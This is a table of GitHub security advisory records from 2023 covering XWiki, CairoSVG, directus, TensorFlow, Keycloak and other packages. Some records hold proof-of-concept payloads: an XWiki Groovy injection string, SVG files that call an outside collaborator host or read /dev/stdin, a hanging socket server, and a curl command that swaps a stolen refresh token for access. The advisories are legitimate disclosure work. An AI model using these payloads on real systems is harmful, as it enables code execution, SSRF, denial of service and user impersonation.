schema_version
stringclasses 1
value | id
stringlengths 19
19
| modified
stringlengths 20
20
| published
stringlengths 20
20
| withdrawn
stringlengths 20
20
⌀ | aliases
stringlengths 2
20
| summary
stringlengths 20
140
| details
stringlengths 56
37.2k
| severity
stringlengths 2
92
| affected
stringlengths 88
7.07k
| references
stringlengths 139
4.72k
| database_specific
stringlengths 131
185
|
|---|---|---|---|---|---|---|---|---|---|---|---|
1.4.0
|
GHSA-qxjg-jhgw-qhrv
|
2023-03-08T17:18:33Z
|
2023-03-08T17:18:33Z
| null |
['CVE-2023-27479']
|
org.xwiki.platform:xwiki-platform-panels-ui vulnerable to Eval Injection
|
### Impact
Any user with view rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of UIX parameters
A proof of concept exploit is to log in, add an `XWiki.UIExtensionClass` xobject to the user profile page, with an Extension Parameters content of:
```
order=100
label={{/html}} {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("Hello " + "from groovy!"){{/groovy}}{{/async}}
icon=icon:pencil
target=XWiki.username
```
Then, navigating to `PanelsCode.ApplicationsPanelConfigurationSheet` (i.e., `<xwiki-host>/xwiki/bin/view/PanelsCode/ApplicationsPanelConfigurationSheet` where `<xwiki-host>` is the URL of your XWiki installation) should not execute the Groovy script. If it does, you will see `Hello from groovy!` displayed on the screen.
### Patches
The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10-rc-1
### Workarounds
The issue can be fixed by editing the `PanelsCode.ApplicationsPanelConfigurationSheet` wiki page and making the same modifications as shown in the [patch](https://github.com/xwiki/xwiki-platform/commit/6de5442f3c91c3634a66c7b458d5b142e1c2a2dc) for this issue.
### References
* https://github.com/xwiki/xwiki-platform/commit/6de5442f3c91c3634a66c7b458d5b142e1c2a2dc
* https://jira.xwiki.org/browse/XWIKI-20294
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-panels-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.3-milestone-2'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-panels-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-panels-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10-rc-1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-qxjg-jhgw-qhrv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27479'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/6de5442f3c91c3634a66c7b458d5b142e1c2a2dc'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20294'}]
|
{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:18:33Z', 'nvd_published_at': '2023-03-07T19:15:00Z'}
|
1.4.0
|
GHSA-h828-v5pv-33qx
|
2023-03-14T19:39:27Z
|
2023-03-03T18:30:27Z
| null |
['CVE-2022-2837']
|
coreDNS vulnerable to Improper Restriction of Communication Channel to Intended Endpoints
|
A flaw was found in coreDNS. This flaw allows a malicious user to redirect traffic intended for external top-level domains (TLD) to a pod they control by creating projects and namespaces that match the TLD.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/coredns/coredns'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.9.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-2837'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2118543'}, {'type': 'PACKAGE', 'url': 'https://github.com/coredns/coredns'}]
|
{'cwe_ids': ['CWE-601', 'CWE-923'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-06T21:43:07Z', 'nvd_published_at': '2023-03-03T16:15:00Z'}
|
1.4.0
|
GHSA-fqm2-gh8w-gr68
|
2023-03-27T22:02:10Z
|
2023-03-24T21:57:09Z
| null |
['CVE-2023-25667']
|
TensorFlow vulnerable to segfault when opening multiframe gif
|
### Impact
Integer overflow occurs when 2^31 <= num_frames * height * width * channels < 2^32, for example Full HD screencast of at least 346 frames.
```python
import urllib.request
dat = urllib.request.urlopen('https://raw.githubusercontent.com/tensorflow/tensorflow/1c38ad9b78ffe06076745a1ee00cec42f39ff726/tensorflow/core/lib/gif/testdata/3g_multiframe.gif').read()
import tensorflow as tf
tf.io.decode_gif(dat)
```
### Patches
We have patched the issue in GitHub commit [8dc723fcdd1a6127d6c970bd2ecb18b019a1a58d](https://github.com/tensorflow/tensorflow/commit/8dc723fcdd1a6127d6c970bd2ecb18b019a1a58d).
The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Andrei
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fqm2-gh8w-gr68'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25667'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8dc723fcdd1a6127d6c970bd2ecb18b019a1a58d'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
|
{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:57:09Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
|
1.4.0
|
GHSA-42c3-wvww-gcqj
|
2023-03-22T18:36:47Z
|
2023-03-22T18:36:47Z
| null |
['CVE-2023-1578']
|
Pimcore Remote Code Execution vulnerability in Search function
|
### Impact
Attacker can get full DB and maybe RCE knowing the WEBROOT path
### Patches
Update to version 10.5.19 or apply this patch manually https://github.com/pimcore/pimcore/commit/367b74488808d71ec3f66f4ca9e8df5217c2c8d2.patch
### Workarounds
Apply patch https://github.com/pimcore/pimcore/commit/367b74488808d71ec3f66f4ca9e8df5217c2c8d2.patch manually.
### References
#14538
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-42c3-wvww-gcqj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1578'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14538'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/367b74488808d71ec3f66f4ca9e8df5217c2c8d2'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/7e441a14-8e55-4ab4-932c-4dc56bb1bc2e/'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-22T18:36:47Z', 'nvd_published_at': '2023-03-22T16:15:00Z'}
|
1.4.0
|
GHSA-rwmf-w63j-p7gv
|
2023-03-20T21:27:15Z
|
2023-03-20T21:27:15Z
| null |
['CVE-2023-27586']
|
CairoSVG improperly processes SVG files loaded from external resources
|
# SSRF vulnerability
## Summary
When CairoSVG processes an SVG file, it can make requests to the inner host and different outside hosts.
## Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9
## Tested CairoSVG version
2.6.0
## Details
A specially crafted SVG file that loads an external resource from a URL. Remote attackers could exploit this vulnerability to cause a scan of an organization's internal resources or a DDOS attack on external resources.
It looks like this bug can affect websites and cause request forgery on the server.
## PoC
1. Generating malicious svg file:
1.1 CairoSVG_exploit.svg:
```svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<image height="200" width="200" xlink:href="http://[jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com](http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/)/3" />
<style type="text/css">@import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/5");</style>
<style type="text/css">
<![CDATA[
@import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/9");
rect { fill: red; stroke: blue; stroke-width: 3 }
]]>
</style>
</svg>
```
1.2 CairoSVG_exploit_2.svg:
```svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<defs>
<pattern id="img1" patternUnits="userSpaceOnUse" width="600" height="450">
<image xlink:href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/11" x="0" y="0" width="600" height="450" />
</pattern>
</defs>
<path d="M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z" fill="url(#img1)" />
</svg>
```
1.3 CairoSVG_exploit_3.svg:
```svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/13" />
</svg>
```
2. Run some commands:
`$ python3 -m cairosvg CairoSVG_exploit.svg -f png`
`$ python3 -m cairosvg CairoSVG_exploit_2.svg -f png`
`$ python3 -m cairosvg CairoSVG_exploit_3.svg -f png `
3. See result requests in Burp Collaborator:

# DOS vulnerability with SSTI
## Summary
When CairoSVG processes an SVG file, it can send requests to external hosts and wait for a response from the external server after a successful TCP handshake. This will cause the server to hang.
It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.
## Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9
## Tested CairoSVG version
2.6.0
## PoC
1. Generating malicious svg file:
```svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="http://192.168.56.1:1234/" />
</svg>
```
2. In other server run this python program:
```python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 1234))
s.listen(1)
conn, addr = s.accept()
with conn:
while True:
data = conn.recv(2048)
s.close()
```
3. Run commands:
`$timeout 60 python3 -m cairosvg CairoSVG_exploit_dos.svg -f png`
(without timeout server will hang forever)
# DOS vulnerability with stdin file descriptor
## Summary
Specially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file.
It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.
## Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9
## Tested CairoSVG version
2.6.0
## PoC
1. Generating malicious svg file:
```svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="file:///dev/stdin" />
</svg>
```
2. In other server run this python program:
```python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 1234))
s.listen(1)
conn, addr = s.accept()
with conn:
while True:
data = conn.recv(2048)
s.close()
```
3. Run commands:
`$timeout 60 python3 -m cairosvg cariosvg_exploit_dos.svg -f png`
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'CairoSVG'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27586'}, {'type': 'WEB', 'url': 'https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255'}, {'type': 'WEB', 'url': 'https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53'}, {'type': 'PACKAGE', 'url': 'https://github.com/Kozea/CairoSVG'}, {'type': 'WEB', 'url': 'https://github.com/Kozea/CairoSVG/releases/tag/2.7.0'}]
|
{'cwe_ids': ['CWE-20', 'CWE-918'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-20T21:27:15Z', 'nvd_published_at': '2023-03-20T16:15:00Z'}
|
1.4.0
|
GHSA-58g2-vgpg-335q
|
2023-04-07T22:47:43Z
|
2023-03-31T21:30:39Z
| null |
['CVE-2023-27163']
|
request-baskets vulnerable to Server-Side Request Forgery
|
request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/darklynx/request-baskets'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27163'}, {'type': 'WEB', 'url': 'https://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3'}, {'type': 'PACKAGE', 'url': 'https://github.com/darklynx/request-baskets'}, {'type': 'WEB', 'url': 'https://notes.sjtu.edu.cn/s/MUUhEymt7'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/174128/Request-Baskets-1.2.1-Server-Side-Request-Forgery.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/174129/Maltrail-0.53-Remote-Code-Execution.html'}, {'type': 'WEB', 'url': 'http://request-baskets.com'}]
|
{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:44:28Z', 'nvd_published_at': '2023-03-31T20:15:00Z'}
|
1.4.0
|
GHSA-6hcf-g6gr-hhcr
|
2023-03-24T22:01:23Z
|
2023-03-24T22:01:23Z
| null |
[]
|
`openssl` `X509Extension::new` and `X509Extension::new_nid` null pointer dereference
|
These functions would crash when the context argument was None with certain extension types.
Thanks to David Benjamin (Google) for reporting this issue.
|
[]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'openssl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.7'}, {'fixed': '0.10.48'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/sfackler/rust-openssl/pull/1854'}, {'type': 'PACKAGE', 'url': 'https://github.com/sfackler/rust-openssl'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0024.html'}]
|
{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T22:01:23Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9hhc-pj4w-w5rv
|
2023-09-26T13:59:05Z
|
2023-03-01T17:38:56Z
| null |
['CVE-2022-4137']
|
Keycloak Cross-site Scripting on OpenID connect login service
|
A reflected cross-site scripting (XSS) vulnerability was found in the `oob` OAuth endpoint due to incorrect null-byte handling. This issue allows a malicious link to insert an arbitrary URI into a Keycloak error page.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-parent'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20.0.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/security/advisories/GHSA-9hhc-pj4w-w5rv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4137'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/pull/16774'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/commit/30d0e9d22dae51392e5a3748a1c68c116667359a'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1043'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1044'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1045'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1049'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2022-4137'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2148496'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]
|
{'cwe_ids': ['CWE-116', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T17:38:56Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-8fww-64cx-x8p5
|
2023-04-06T22:55:38Z
|
2023-03-26T21:30:23Z
| null |
['CVE-2023-28859']
|
redis-py Race Condition due to incomplete fix
|
redis-py through 4.5.3 and 4.4.3 leaves a connection open after canceling an async Redis command at an inopportune time (in the case of a non-pipeline operation), and can send response data to the client of an unrelated request. NOTE: this issue exists because of an incomplete fix for CVE-2023-28858.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'redis'}, 'ecosystem_specific': {'affected_functions': ['redis.asyncio.client.Pipeline']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.0'}, {'fixed': '4.5.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'redis'}, 'ecosystem_specific': {'affected_functions': ['redis.asyncio.client.Pipeline']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.4.4'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28859'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/issues/2665'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/pull/1899'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/pull/2641'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/pull/2666'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/pull/2671'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/commit/66a4d6b2a493dd3a20cc299ab5fef3c14baad965'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/commit/b3c89acd0ffe8303649ad8207bc911b1d6a033eb'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/redis/PYSEC-2023-46.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/redis/redis-py'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/releases/tag/v4.4.4'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/releases/tag/v4.5.4'}]
|
{'cwe_ids': ['CWE-459'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-27T21:31:52Z', 'nvd_published_at': '2023-03-26T19:15:00Z'}
|
1.4.0
|
GHSA-8vg2-wf3q-mwv7
|
2023-03-31T16:08:10Z
|
2023-03-23T19:47:12Z
| null |
['CVE-2023-28443']
|
directus vulnerable to Insertion of Sensitive Information into Log File
|
### Summary
CWE-532: Insertion of Sensitive Information into Log File discovered in v9.23.1. The `directus_refresh_token` is not redacted properly from the log outputs and can be used to impersonate users without their permission.
### Details
Using `v9.23.1`, I am seeing that the `directus_refresh_token` is not properly redacted as indicated by https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13
I'm classifying this as a security vulnerability because if someone has access to the log outputs, for example with a shared Cloud account or Splunk implementation, they could exchange the refresh token using `/auth/refresh` for an access token and use the token to perform actions on behalf of an unsuspecting user. This situation creates issues with accountability and non-repudiation because we can no longer have confidence that actions taken in the application were authorized or even performed by the logged-in user.
A couple of examples of this are:
- A disgruntled employee deletes all of the data to get even with a target team member before logging off on their last day
- Under the guise of their unsuspecting boss, a mischievous engineer uploads _questionable_ images that get displayed on internal or external facing content sites
The list could go on but I think these communicate the risk of an internal threat that has access to this information 😆
### PoC
1. Set `LOG_STYLE="raw"` and run Directus v9.23.1
1. Log in to the application
1. Look at the shell output and see that `directus_refresh_token` is logged
> Note: This is different from the standard `raw` output format. I intentionally ran this with `npx directus start | pino-pretty` so logs would be easier to read. It can also be reproduced by running `npx directus start` alone.

1. Exchange the `directus_refresh_token` for an `access_token`
``` shell
curl -X POST \
'http://0.0.0.0:8055/auth/refresh' \
--header 'Accept: */*' \
--header 'Cookie: directus_refresh_token=$shh'
```
### Impact
Because this can be used to exploit other threats related to [CWE-284: Improper Access Control](https://cwe.mitre.org/data/definitions/284.html) I rank it with a Moderate severity. An insider with knowledge of this could do many mischievous things and get away with them for a long time without victims knowing about it.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'directus'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.23.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28443'}, {'type': 'WEB', 'url': 'https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc'}, {'type': 'PACKAGE', 'url': 'https://github.com/directus/directus'}, {'type': 'WEB', 'url': 'https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13'}]
|
{'cwe_ids': ['CWE-284', 'CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T19:47:12Z', 'nvd_published_at': '2023-03-24T00:15:00Z'}
|
1.4.0
|
GHSA-9324-jv53-9cc8
|
2023-03-21T22:41:11Z
|
2023-03-21T22:41:11Z
| null |
['CVE-2021-31402']
|
dio vulnerable to CRLF injection with HTTP method string
|
### Impact
The dio package 4.0.0 for Dart allows CRLF injection if the attacker controls the HTTP method string, a different vulnerability than CVE-2020-35669.
### Patches
The vulnerability has been resolved by https://github.com/cfug/dio/commit/927f79e93ba39f3c3a12c190624a55653d577984, and included since v5.0.0.
### Workarounds
Cherry-pick the commit to your own fork can resolves the vulberability too.
### References
- https://nvd.nist.gov/vuln/detail/CVE-2021-31402
- https://osv.dev/GHSA-jwpw-q68h-r678
- https://github.com/cfug/dio/issues/1130
- https://github.com/cfug/dio/issues/1752
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Pub', 'name': 'dio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/cfug/dio/security/advisories/GHSA-9324-jv53-9cc8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31402'}, {'type': 'WEB', 'url': 'https://github.com/cfug/dio/issues/1752'}, {'type': 'WEB', 'url': 'https://github.com/flutterchina/dio/issues/1130'}, {'type': 'WEB', 'url': 'https://github.com/cfug/dio/commit/927f79e93ba39f3c3a12c190624a55653d577984'}, {'type': 'PACKAGE', 'url': 'https://github.com/cfug/dio'}, {'type': 'WEB', 'url': 'https://osv.dev/GHSA-jwpw-q68h-r678'}]
|
{'cwe_ids': ['CWE-74', 'CWE-88', 'CWE-93'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:41:11Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-6rfv-h5v8-cj7g
|
2023-04-07T21:33:30Z
|
2023-03-31T21:30:37Z
| null |
['CVE-2023-1784']
|
jeecg-boot vulnerable to improper authentication
|
A vulnerability was found in jeecg-boot 3.5.0 that affects some unknown processing of the component API Documentation. The manipulation leads to improper authentication because the software does not prove or insufficiently proves that an identity claim is correct when an actor claims to have a given identity. The attack may be initiated remotely and the exploit has been disclosed to the public and may be used.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.5.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1784'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot/'}, {'type': 'WEB', 'url': 'https://note.youdao.com/ynoteshare/index.html?id=7eb8fc804ea3544d8add43749a09173e'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.224699'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.224699'}]
|
{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T21:33:30Z', 'nvd_published_at': '2023-03-31T20:15:00Z'}
|
1.4.0
|
GHSA-7q9c-f2v8-j8gw
|
2023-04-06T22:56:35Z
|
2023-03-31T03:30:31Z
| null |
['CVE-2023-1760']
|
phpMyFAQ Stored Cross-site Scripting vulnerability
|
Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1760'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/56295b54062a284020fccce12a5044f9fa7d2770'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/2d0ac48a-490d-4548-8d98-7447042dd1b5'}]
|
